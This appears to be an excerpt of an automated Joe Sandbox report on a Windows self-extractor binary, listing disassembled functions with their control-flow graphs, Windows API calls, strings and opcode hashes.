                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                  • String ID: .exe$.inf$PDu<($h($r(
                                                                                  • API String ID: 36480843-1675706169
                                                                                  • Opcode ID: 041538c7d0bd45725d65598778d851cbda58e2e75fb3a8244d58158ce5941bc1
                                                                                  • Instruction ID: c657c54a2fa608d2786f5c5e67cfe53bc508e7df078211f6d402c8c5c40566e5
                                                                                  • Opcode Fuzzy Hash: 041538c7d0bd45725d65598778d851cbda58e2e75fb3a8244d58158ce5941bc1
                                                                                  • Instruction Fuzzy Hash: CE5106785263829ADB31BF24E844BABBBE4AF42744F04081EF5C4971D1D7B09DADCB12
                                                                                  Function 00293B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 913 293b72-293b7c 914 293bee-293bf1 913->914 915 293b7e-293b8c 914->915 916 293bf3 914->916 917 293b8e-293b91 915->917 918 293b95-293bb1 LoadLibraryExW 915->918 919 293bf5-293bf9 916->919 920 293c09-293c0b 917->920 921 293b93 917->921 922 293bfa-293c00 918->922 923 293bb3-293bbc GetLastError 918->923 920->919 925 293beb 921->925 922->920 924 293c02-293c03 FreeLibrary 922->924 926 293bbe-293bd3 call 296088 923->926 927 293be6-293be9 923->927 924->920 925->914 926->927 930 293bd5-293be4 LoadLibraryExW 926->930 927->925 930->922 930->927
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00293C35,00000000,00000FA0,002D2088,00000000,?,00293D60,00000004,InitializeCriticalSectionEx,002A6394,InitializeCriticalSectionEx,00000000), ref: 00293C03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID: api-ms-$c*)
                                                                                  • API String ID: 3664257935-2293865823
                                                                                  • Opcode ID: 69a74609656642d6f68444f3ecec3add6bb849f9e72417ea74b37b25fe39aed6
                                                                                  • Instruction ID: f845c86b78fe8c1d0b23213685f3dde4627597ad0bd4c15bd700a6ad90aafd36
                                                                                  • Opcode Fuzzy Hash: 69a74609656642d6f68444f3ecec3add6bb849f9e72417ea74b37b25fe39aed6
                                                                                  • Instruction Fuzzy Hash: CA110632A25622ABCF32CF68AC59B5D77A49F02774F250121F911FB290EB70EF1086D1
                                                                                  Function 0029A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 931 29a95b-29a974 932 29a98a-29a98f 931->932 933 29a976-29a986 call 29ef4c 931->933 935 29a99c-29a9c0 MultiByteToWideChar 932->935 936 29a991-29a999 932->936 933->932 940 29a988 933->940 938 29ab53-29ab66 call 28fbbc 935->938 939 29a9c6-29a9d2 935->939 936->935 941 29a9d4-29a9e5 939->941 942 29aa26 939->942 940->932 946 29aa04-29aa15 call 298e06 941->946 947 29a9e7-29a9f6 call 2a2010 941->947 945 29aa28-29aa2a 942->945 949 29ab48 945->949 950 29aa30-29aa43 MultiByteToWideChar 945->950 946->949 957 29aa1b 946->957 947->949 956 29a9fc-29aa02 947->956 955 29ab4a-29ab51 call 29abc3 949->955 950->949 954 29aa49-29aa5b call 29af6c 950->954 961 29aa60-29aa64 954->961 955->938 960 29aa21-29aa24 956->960 957->960 960->945 961->949 963 29aa6a-29aa71 961->963 964 29aaab-29aab7 963->964 965 29aa73-29aa78 963->965 966 29aab9-29aaca 964->966 967 29ab03 964->967 965->955 968 29aa7e-29aa80 965->968 971 29aacc-29aadb call 2a2010 966->971 972 29aae5-29aaf6 call 298e06 966->972 969 29ab05-29ab07 967->969 968->949 970 29aa86-29aaa0 call 29af6c 968->970 973 29ab09-29ab22 call 29af6c 969->973 974 29ab41-29ab47 call 29abc3 969->974 970->955 984 29aaa6 970->984 971->974 986 29aadd-29aae3 971->986 972->974 987 29aaf8 972->987 973->974 988 29ab24-29ab2b 973->988 974->949 984->949 989 29aafe-29ab01 986->989 987->989 990 29ab2d-29ab2e 988->990 991 29ab67-29ab6d 988->991 989->969 992 29ab2f-29ab3f WideCharToMultiByte 990->992 991->992 992->974 993 29ab6f-29ab76 call 29abc3 992->993 993->955
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002957FB,002957FB,?,?,?,0029ABAC,00000001,00000001,2DE85006), ref: 0029A9B5
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0029ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0029AA3B
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0029AB35
                                                                                  • __freea.LIBCMT ref: 0029AB42
                                                                                    • Part of subcall function 00298E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  • __freea.LIBCMT ref: 0029AB4B
                                                                                  • __freea.LIBCMT ref: 0029AB70
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1414292761-0
                                                                                  • Opcode ID: 38a59357d5b686803409ec8c2a4bf14cc40da359b6e5e91cef55d5f9c4d4625d
                                                                                  • Instruction ID: 5486af2ba8262c5413141b746beb4407bcfca1a048a9210344e0767194e65dbe
                                                                                  • Opcode Fuzzy Hash: 38a59357d5b686803409ec8c2a4bf14cc40da359b6e5e91cef55d5f9c4d4625d
                                                                                  • Instruction Fuzzy Hash: 8451D172620316ABDF258E64CC52EBBB7AAEB64754F154628FC08D6140EB34DC60CAD2
                                                                                  Function 0028AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0028081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00280836
                                                                                    • Part of subcall function 0028081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027F2D8,Crypt32.dll,00000000,0027F35C,?,?,0027F33E,?,?,?), ref: 00280858
                                                                                  • OleInitialize.OLE32(00000000), ref: 0028AC2F
                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028AC66
                                                                                  • SHGetMalloc.SHELL32(002B8438), ref: 0028AC70
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                  • String ID: riched20.dll$3Ro
                                                                                  • API String ID: 3498096277-3613677438
                                                                                  • Opcode ID: a3ec375bb83bd8bfddc92be9cfaed4b47b2840478b1e73d3dad243c18b0a11a7
                                                                                  • Instruction ID: fbb3581f70418e831f821989688e13b393de59190b0da25dbdfef5d58d55ca7f
                                                                                  • Opcode Fuzzy Hash: a3ec375bb83bd8bfddc92be9cfaed4b47b2840478b1e73d3dad243c18b0a11a7
                                                                                  • Instruction Fuzzy Hash: AEF049B5D01209ABCB10AFA9E8499EFFBFCEF85700F00402AA405A2241CBB45A058FA1
                                                                                  Function 002798E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1000 2798e0-279901 call 28ec50 1003 279903-279906 1000->1003 1004 27990c 1000->1004 1003->1004 1005 279908-27990a 1003->1005 1006 27990e-27991f 1004->1006 1005->1006 1007 279927-279931 1006->1007 1008 279921 1006->1008 1009 279936-279943 call 276edb 1007->1009 1010 279933 1007->1010 1008->1007 1013 279945 1009->1013 1014 27994b-27996a CreateFileW 1009->1014 1010->1009 1013->1014 1015 27996c-27998e GetLastError call 27bb03 1014->1015 1016 2799bb-2799bf 1014->1016 1021 2799c8-2799cd 1015->1021 1022 279990-2799b3 CreateFileW GetLastError 1015->1022 1018 2799c3-2799c6 1016->1018 1020 2799d9-2799de 1018->1020 1018->1021 1024 2799e0-2799e3 1020->1024 1025 2799ff-279a10 1020->1025 1021->1020 1023 2799cf 1021->1023 1022->1018 1028 2799b5-2799b9 1022->1028 1023->1020 1024->1025 1029 2799e5-2799f9 SetFileTime 1024->1029 1026 279a12-279a2a call 280602 1025->1026 1027 279a2e-279a39 1025->1027 1026->1027 1028->1018 1029->1025
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00277760,?,00000005,?,00000011), ref: 0027995F
                                                                                  • GetLastError.KERNEL32(?,?,00277760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0027996C
                                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00277760,?,00000005,?), ref: 002799A2
                                                                                  • GetLastError.KERNEL32(?,?,00277760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002799AA
                                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00277760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002799F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CreateErrorLast$Time
                                                                                  • String ID:
                                                                                  • API String ID: 1999340476-0
                                                                                  • Opcode ID: 3142c71c2eed08ea37c3adcd07d7b454dc582f24c755b2bb34e872b9e49be454
                                                                                  • Instruction ID: ae562c0777807d7013674cdfade82acc0e492bf0b78441e03bfe5c9103900816
                                                                                  • Opcode Fuzzy Hash: 3142c71c2eed08ea37c3adcd07d7b454dc582f24c755b2bb34e872b9e49be454
                                                                                  • Instruction Fuzzy Hash: D9312730554746EFE730DF24CC4ABDABB94BB06320F104B1DFAA9961D0D7B4A9A4CB91
                                                                                  Function 0028B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1059 28b568-28b581 PeekMessageW 1060 28b5bc-28b5be 1059->1060 1061 28b583-28b597 GetMessageW 1059->1061 1062 28b5a8-28b5b6 TranslateMessage DispatchMessageW 1061->1062 1063 28b599-28b5a6 IsDialogMessageW 1061->1063 1062->1060 1063->1060 1063->1062
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028B579
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B58A
                                                                                  • IsDialogMessageW.USER32(0001047E,?), ref: 0028B59E
                                                                                  • TranslateMessage.USER32(?), ref: 0028B5AC
                                                                                  • DispatchMessageW.USER32(?), ref: 0028B5B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1266772231-0
                                                                                  • Opcode ID: e7a70e0545691c67490321deeb9800962342f575e0d68203ccab2c15ce96bd99
                                                                                  • Instruction ID: 26919460f51f175317e79d062712f7fdbc93b526158a2a12bfb0a888cac12096
                                                                                  • Opcode Fuzzy Hash: e7a70e0545691c67490321deeb9800962342f575e0d68203ccab2c15ce96bd99
                                                                                  • Instruction Fuzzy Hash: B8F0A971E0212AAA8B20EBA5FC4CDDB7FACEE053917404415B509D2050EB28DA19CBB1
                                                                                  Function 0028ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1064 28abab-28abca GetClassNameW 1065 28abcc-28abe1 call 281fbb 1064->1065 1066 28abf2-28abf4 1064->1066 1071 28abf1 1065->1071 1072 28abe3-28abef FindWindowExW 1065->1072 1067 28abff-28ac01 1066->1067 1068 28abf6-28abf9 SHAutoComplete 1066->1068 1068->1067 1071->1066 1072->1071
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 0028ABC2
                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0028ABF9
                                                                                    • Part of subcall function 00281FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0027C116,00000000,.exe,?,?,00000800,?,?,?,00288E3C), ref: 00281FD1
                                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0028ABE9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                  • String ID: EDIT
                                                                                  • API String ID: 4243998846-3080729518
                                                                                  • Opcode ID: d1afbc244aaf922b5342c695db3ab17e2b70dcc28962a5cc7c2c4742bdeb8bed
                                                                                  • Instruction ID: b664138e6ead6c0edd8d5437cfb195ee8344f567984b9515e0caa59ee1149ffa
                                                                                  • Opcode Fuzzy Hash: d1afbc244aaf922b5342c695db3ab17e2b70dcc28962a5cc7c2c4742bdeb8bed
                                                                                  • Instruction Fuzzy Hash: 79F08936A1222977E720AA64AC09F9F77AC9B56B41F484012BA05B21C0DB60DE5186B6
                                                                                  Function 0028DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1073 28dbde-28dc09 call 28ec50 SetEnvironmentVariableW call 280371 1077 28dc0e-28dc12 1073->1077 1078 28dc14-28dc18 1077->1078 1079 28dc36-28dc38 1077->1079 1080 28dc21-28dc28 call 28048d 1078->1080 1083 28dc1a-28dc20 1080->1083 1084 28dc2a-28dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1079
                                                                                  APIs
                                                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0028DBF4
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0028DC30
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentVariable
                                                                                  • String ID: sfxcmd$sfxpar
                                                                                  • API String ID: 1431749950-3493335439
                                                                                  • Opcode ID: f79c8bd6ed3fb8a56deeeb811506089475581092d4915e1567ce8222d19c04aa
                                                                                  • Instruction ID: 62111c8ba296510c06b213f92e772d0049f36be29b8c7a146edb78ef262bf220
                                                                                  • Opcode Fuzzy Hash: f79c8bd6ed3fb8a56deeeb811506089475581092d4915e1567ce8222d19c04aa
                                                                                  • Instruction Fuzzy Hash: 74F0ECB6526235ABCF203F959C0ABFB7758AF16B81B040452FD89950D1DBF08964DBB0
                                                                                  Function 00279785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1085 279785-279791 1086 279793-27979b GetStdHandle 1085->1086 1087 27979e-2797b5 ReadFile 1085->1087 1086->1087 1088 2797b7-2797c0 call 2798bc 1087->1088 1089 279811 1087->1089 1093 2797c2-2797ca 1088->1093 1094 2797d9-2797dd 1088->1094 1091 279814-279817 1089->1091 1093->1094 1097 2797cc 1093->1097 1095 2797df-2797e8 GetLastError 1094->1095 1096 2797ee-2797f2 1094->1096 1095->1096 1098 2797ea-2797ec 1095->1098 1099 2797f4-2797fc 1096->1099 1100 27980c-27980f 1096->1100 1101 2797cd-2797d7 call 279785 1097->1101 1098->1091 1099->1100 1103 2797fe-279807 GetLastError 1099->1103 1100->1091 1101->1091 1103->1100 1105 279809-27980a 1103->1105 1105->1101
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00279795
                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 002797AD
                                                                                  • GetLastError.KERNEL32 ref: 002797DF
                                                                                  • GetLastError.KERNEL32 ref: 002797FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                  • String ID:
                                                                                  • API String ID: 2244327787-0
                                                                                  • Opcode ID: 15f088d37526c848dc5ea10d0ab41c5d3ba8cfd2a0eb5029c212b516f5ba18fc
                                                                                  • Instruction ID: 983c56307a03caa068d4f6a90e956878a91df8400c4f59db5fe93b462f503dea
                                                                                  • Opcode Fuzzy Hash: 15f088d37526c848dc5ea10d0ab41c5d3ba8cfd2a0eb5029c212b516f5ba18fc
                                                                                  • Instruction Fuzzy Hash: 66118270934305EBDF249F65D804A69B7A9FB42330F10C629F41E85190D7749EE4DB62
                                                                                  Function 0029AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002940EF,00000000,00000000,?,0029ACDB,002940EF,00000000,00000000,00000000,?,0029AED8,00000006,FlsSetValue), ref: 0029AD66
                                                                                  • GetLastError.KERNEL32(?,0029ACDB,002940EF,00000000,00000000,00000000,?,0029AED8,00000006,FlsSetValue,002A7970,FlsSetValue,00000000,00000364,?,002998B7), ref: 0029AD72
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0029ACDB,002940EF,00000000,00000000,00000000,?,0029AED8,00000006,FlsSetValue,002A7970,FlsSetValue,00000000), ref: 0029AD80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: f4c79968d877146b98d884c172fcad8a74efa3fa420ba76d17f7b769f90ff0d3
                                                                                  • Instruction ID: 6387640456eed353959f64fab34b8c556b8810a2f4756633d46047b5ca79c01c
                                                                                  • Opcode Fuzzy Hash: f4c79968d877146b98d884c172fcad8a74efa3fa420ba76d17f7b769f90ff0d3
                                                                                  • Instruction Fuzzy Hash: C501F736621323ABCF218F68EC48A577B58EF46BA27110620FD06D7650DB30DD1186F1
                                                                                  Function 0029BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 002997E5: GetLastError.KERNEL32(?,002B1098,00294674,002B1098,?,?,002940EF,?,?,002B1098), ref: 002997E9
                                                                                    • Part of subcall function 002997E5: _free.LIBCMT ref: 0029981C
                                                                                    • Part of subcall function 002997E5: SetLastError.KERNEL32(00000000,?,002B1098), ref: 0029985D
                                                                                    • Part of subcall function 002997E5: _abort.LIBCMT ref: 00299863
                                                                                    • Part of subcall function 0029BB4E: _abort.LIBCMT ref: 0029BB80
                                                                                    • Part of subcall function 0029BB4E: _free.LIBCMT ref: 0029BBB4
                                                                                    • Part of subcall function 0029B7BB: GetOEMCP.KERNEL32(00000000,?,?,0029BA44,?), ref: 0029B7E6
                                                                                  • _free.LIBCMT ref: 0029BA9F
                                                                                  • _free.LIBCMT ref: 0029BAD5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorLast_abort
                                                                                  • String ID: p*
                                                                                  • API String ID: 2991157371-4114540210
                                                                                  • Opcode ID: 6a9422280c9b5b62c71e25258fce54d498f39eb6c72edf9cfea5a603b563cd39
                                                                                  • Instruction ID: 1b8b92b1945c9237edaf42aa5fc539cfd42b4aac558bcf78858fac959bb33f5f
                                                                                  • Opcode Fuzzy Hash: 6a9422280c9b5b62c71e25258fce54d498f39eb6c72edf9cfea5a603b563cd39
